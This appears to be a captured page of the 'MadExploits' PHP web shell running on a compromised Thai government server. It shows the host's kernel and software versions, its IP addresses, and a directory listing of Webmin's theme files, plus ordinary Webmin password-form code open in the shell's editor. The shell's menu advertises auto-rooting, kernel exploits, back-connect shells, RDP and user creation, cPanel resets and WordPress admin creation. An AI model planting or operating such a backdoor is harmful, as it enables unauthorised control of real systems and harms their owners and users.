Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
libexec /
webmin /
authentic-theme /
[ HOME SHELL ]
Name
Size
Permission
Action
extensions
[ DIR ]
drwxr-xr-x
help
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
lang
[ DIR ]
drwxr-xr-x
lib
[ DIR ]
drwxr-xr-x
unauthenticated
[ DIR ]
drwxr-xr-x
401.cgi
368
B
-rwxr-xr-x
403.cgi
368
B
-rwxr-xr-x
404.cgi
368
B
-rwxr-xr-x
CHANGELOG.md
42.47
KB
-rw-r--r--
FUNDING.yml
98
B
-rw-r--r--
LICENSE
1.04
KB
-rw-r--r--
THEME.pgp
3
KB
-rw-r--r--
authentic-funcs.pl
14.46
KB
-rw-r--r--
authentic-init.pl
55.65
KB
-rw-r--r--
authentic-lib.pl
160.83
KB
-rw-r--r--
authentic.pl
43.86
KB
-rw-r--r--
buttons.pl
6.97
KB
-rw-r--r--
config
129
B
-rw-r--r--
index.cgi
334
B
-rwxr-xr-x
navigation.pl
8.67
KB
-rw-r--r--
pam_login.cgi
6.22
KB
-rwxr-xr-x
password_form.cgi
3.85
KB
-rwxr-xr-x
session_login.cgi
6.67
KB
-rwxr-xr-x
settings-backgrounds.cgi
3.65
KB
-rwxr-xr-x
settings-backgrounds_save.cgi
1.17
KB
-rwxr-xr-x
settings-editor_favorites_read...
923
B
-rwxr-xr-x
settings-editor_favorites_writ...
704
B
-rwxr-xr-x
settings-editor_read.cgi
2.55
KB
-rwxr-xr-x
settings-editor_write.cgi
848
B
-rwxr-xr-x
settings-favorites_save.cgi
663
B
-rwxr-xr-x
settings-logos.cgi
4.65
KB
-rwxr-xr-x
settings-logos_save.cgi
1.76
KB
-rwxr-xr-x
settings-user.cgi
7.32
KB
-rwxr-xr-x
settings.pl
735
B
-rw-r--r--
stats.cgi
8.84
KB
-rwxr-xr-x
sysinfo.cgi
5.94
KB
-rwxr-xr-x
theme-update.sh
7.3
KB
-rwxr-xr-x
theme.info
224
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : password_form.cgi
#!/usr/bin/perl # # Authentic Theme (https://github.com/authentic-theme/authentic-theme) # Copyright Ilia Rostovtsev <programming@rostovtsev.io> # Licensed under MIT (https://github.com/authentic-theme/authentic-theme/blob/master/LICENSE) # use strict; use File::Basename; our (%in, %gconfig, %text, $pragma_no_cache, %theme_text, %theme_config); do(dirname(__FILE__) . "/authentic-lib.pl"); $pragma_no_cache = 1; $ENV{'MINISERV_INTERNAL'} || die "Can only be called by miniserv.pl"; my $charset = &get_charset(); &PrintHeader($charset); print '<!DOCTYPE HTML>', "\n"; print '<html data-bgs="' . $theme_config{'settings_background_color'} . '" class="session_login">', "\n"; embed_login_head(); print '<body class="session_login">' . "\n"; print '<div class="container session_login">' . "\n"; if ($in{'expired'} == 2) { print '<div class="alert alert-info">' . "\n"; print '<i class ="fa fa-exclamation-triangle"></i> ' . $text{'password_temp'} . '' . "\n"; print '</div>' . "\n"; } else { print '<div class="alert alert-info">' . "\n"; print '<i class ="fa fa-exclamation-triangle"></i> ' . $text{'password_expired'} . '' . "\n"; print '</div>' . "\n"; } # Start of the form print "$text{'password_prefix'}\n"; print '<form method="post" target="_top" action="' . $gconfig{'webprefix'} . '/password_change.cgi" class="form-signin session_login clearfix" role="form" onsubmit="spinner()">' . "\n"; print ui_hidden("user", $in{'user'}); print ui_hidden("pam", $in{'pam'}); print ui_hidden("expired", $in{'expired'}); print '<i class="wbm-webmin"></i><h2 class="form-signin-heading"> <span>' . (&get_product_name() eq 'webmin' ? $theme_text{'theme_xhred_titles_wm'} : $theme_text{'theme_xhred_titles_um'} ) . '</span></h2>' . "\n"; # Process logo embed_logo(); # Login message my $host; if ($gconfig{'realname'}) { $host = &get_display_hostname(); } else { $host = get_env('server_name'); $host =~ s/:\d+//g; $host = &html_escape($host); } print '<p class="form-signin-paragraph">' . theme_text('theme_new_password_header') . ' <em><strong>' . $in{'user'} . '</strong></em></p>' . "\n"; print '<div class="input-group form-group">' . "\n"; print '<span class="input-group-addon"><i class="fa fa-fw fa-key"></i></span>' . "\n"; print '<input type="password" class="form-control session_login" name="old" autocomplete="off" autocorrect="off" placeholder="' . theme_text('password_old') . '">' . "\n"; print '</div>' . "\n"; print '<div class="input-group form-group">' . "\n"; print '<span class="input-group-addon"><i class="fa fa-fw fa-key-plus"></i></span>' . "\n"; print '<input type="password" class="form-control session_login" name="new1" autocomplete="off" autocorrect="off" placeholder="' . theme_text('password_new1') . '">' . "\n"; print '</div>' . "\n"; print '<div class="input-group form-group">' . "\n"; print '<span class="input-group-addon"><i class="fa fa-fw fa-key-plus"></i></span>' . "\n"; print '<input type="password" class="form-control session_login" name="new2" autocomplete="off" autocorrect="off" placeholder="' . theme_text('password_new2') . '">' . "\n"; print '</div>' . "\n"; print '<div class="form-group">'; print '<button class="btn btn-primary" type="submit" style="margin-top: 0 !important; width: 100%"><i class="fa fa-unlock"></i> ' . &theme_text('password_ok') . '</button>' . "\n"; print '<script>function spinner(){var x=$(".fa.fa-unlock"),s =\'<span class="cspinner_container" style="position: absolute; width: 18px; height: 14px; display: inline-block;"><span class="cspinner" style="margin-top: 2px; margin-left: -22px;"><span class="cspinner-icon white small"></span></span></span>\';x.addClass("invisible").after(s);x.parent(".btn").addClass("disabled")}</script>'; print '</div>'; print '</form>' . "\n"; print "$text{'password_postfix'}\n"; &footer();
Close